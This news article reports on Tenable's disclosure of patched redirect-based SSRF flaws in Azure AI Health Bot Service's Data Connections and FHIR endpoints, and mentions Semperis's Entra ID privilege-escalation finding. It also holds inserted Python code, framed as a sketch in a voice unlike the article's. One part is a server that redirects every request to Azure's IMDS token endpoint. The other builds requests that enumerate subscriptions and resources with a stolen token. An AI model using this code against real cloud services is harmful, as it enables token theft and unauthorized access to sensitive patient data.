Researchers Uncover Vulnerabilities in AI-Powered Azure Health Bot Service
Cybersecurity researchers have discovered two vulnerabilities in Microsoft's AI-powered Azure Health Bot Service that, if exploited, could allow a malicious actor to move laterally within customer environments and access sensitive patient data.
The critical flaws, which have since been patched by Microsoft, could have permitted access to cross-tenant resources within the service, according to a new report from Tenable shared with The Hacker News.
The Azure AI Health Bot Service is a cloud platform that enables developers in healthcare organizations to build and deploy AI-powered virtual health assistants, including assistants that handle administrative workloads and communicate with their patients.
This includes bots built by insurance companies that let customers check the status of a claim and ask questions about benefits and services, as well as bots operated by healthcare providers to help patients find appropriate care or locate nearby doctors.
Tenable's research focuses specifically on an aspect of the Azure AI Health Bot Service called Data Connections, which, as the name implies, offers a mechanism for integrating data from external sources, whether third parties or the service providers' own API endpoints.
Although the feature comes with built-in safeguards to prevent unauthorized access to internal APIs, further investigation found that these protections could be bypassed by issuing redirect responses (i.e., 301 or 302 status codes) when configuring a data connection whose external host is under the attacker's control.
By setting up the host to respond to requests with a 301 redirect destined for Azure's Instance Metadata Service (IMDS), Tenable said it was possible to obtain a valid metadata response and then get hold of an access token for management.azure[.]com.
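A minimal sketch of the attacker-controlled host described above (a hypothetical illustration, not Tenable's actual proof-of-concept): instead of serving data, the server answers every request with a 301 redirect pointing at IMDS's token endpoint, so a vulnerable backend fetcher that follows redirects ends up querying IMDS on the attacker's behalf. The IMDS URL shown is Azure's real metadata token endpoint, which is only reachable from inside Azure infrastructure.

```python
import http.server
import threading

# Azure's Instance Metadata Service token endpoint (link-local address,
# reachable only from within an Azure-hosted environment).
IMDS_TOKEN_URL = (
    "http://169.254.169.254/metadata/identity/oauth2/token"
    "?api-version=2018-02-01&resource=https://management.azure.com/"
)

class RedirectToIMDS(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        # Answer with a 301 so a server-side fetcher that follows
        # redirects is steered toward IMDS instead of this host.
        self.send_response(301)
        self.send_header("Location", IMDS_TOKEN_URL)
        self.end_headers()

    def log_message(self, *args):
        # Suppress per-request logging for this sketch.
        pass

def serve(port: int = 0) -> http.server.HTTPServer:
    """Start the redirect server on localhost and return the server object."""
    server = http.server.HTTPServer(("127.0.0.1", port), RedirectToIMDS)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server
```

Note that legitimate IMDS clients must send a `Metadata: true` header; part of what makes this class of SSRF dangerous is that a trusted backend component may add such headers itself when following the redirect.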
This token could then be used to list the subscriptions it provides access to by means of a call to a Microsoft endpoint that, in turn, returns an internal subscription ID, which could finally be used to enumerate accessible resources via another API call.
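The enumeration step can be sketched as follows. This is a hypothetical illustration built on the public Azure Resource Manager REST API (the "Subscriptions - List" and "Resources - List" operations); the helper names are my own, and actually sending the requests would require a valid stolen token, so the network call is shown commented out.

```python
ARM_BASE = "https://management.azure.com"

def build_subscriptions_request(access_token: str) -> tuple[str, dict]:
    """URL and headers for ARM's 'Subscriptions - List' operation."""
    url = f"{ARM_BASE}/subscriptions?api-version=2020-01-01"
    headers = {"Authorization": f"Bearer {access_token}"}
    return url, headers

def build_resources_request(subscription_id: str, access_token: str) -> tuple[str, dict]:
    """URL and headers for listing the resources in one subscription."""
    url = f"{ARM_BASE}/subscriptions/{subscription_id}/resources?api-version=2021-04-01"
    headers = {"Authorization": f"Bearer {access_token}"}
    return url, headers

# Sending the request (requires a real management-plane token):
# import urllib.request, json
# url, headers = build_subscriptions_request(token)
# req = urllib.request.Request(url, headers=headers)
# subscriptions = json.load(urllib.request.urlopen(req))["value"]
```

The two calls mirror the sequence described in the report: the first reveals which subscription IDs the token can reach, and the second enumerates the resources inside each one.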
Tenable also found that another endpoint, related to systems that support the Fast Healthcare Interoperability Resources (FHIR) data exchange format, was susceptible to the same attack.
Tenable said it reported its findings to Microsoft in June and July 2024, following which the tech giant began rolling out fixes to all regions. There is no evidence that the issues were exploited in the wild.

"The vulnerabilities raise questions about the potential exploitation of chatbots to expose confidential details," Tenable said in a statement. "Specifically, the vulnerabilities revealed a flaw in the foundational architecture of the chatbot service, emphasizing the criticality of conventional web application and cloud security in the era of AI-driven chatbots."
The disclosure comes days after Semperis detailed an attack technique called UnOAuthorized that allows privilege escalation using Microsoft Entra ID (formerly Azure Active Directory), including the ability to add and remove users from privileged roles. Microsoft has since plugged the security hole.
“A malicious actor could have abused such access to perform privilege elevation to Global Administrator and plant further persistence mechanisms in a tenant,” security researcher Eric Woodruff explained. “An attacker could also exploit this access for lateral movement into any system on Microsoft 365 or Azure, as well as any Software as a Service application linked to Entra ID.”


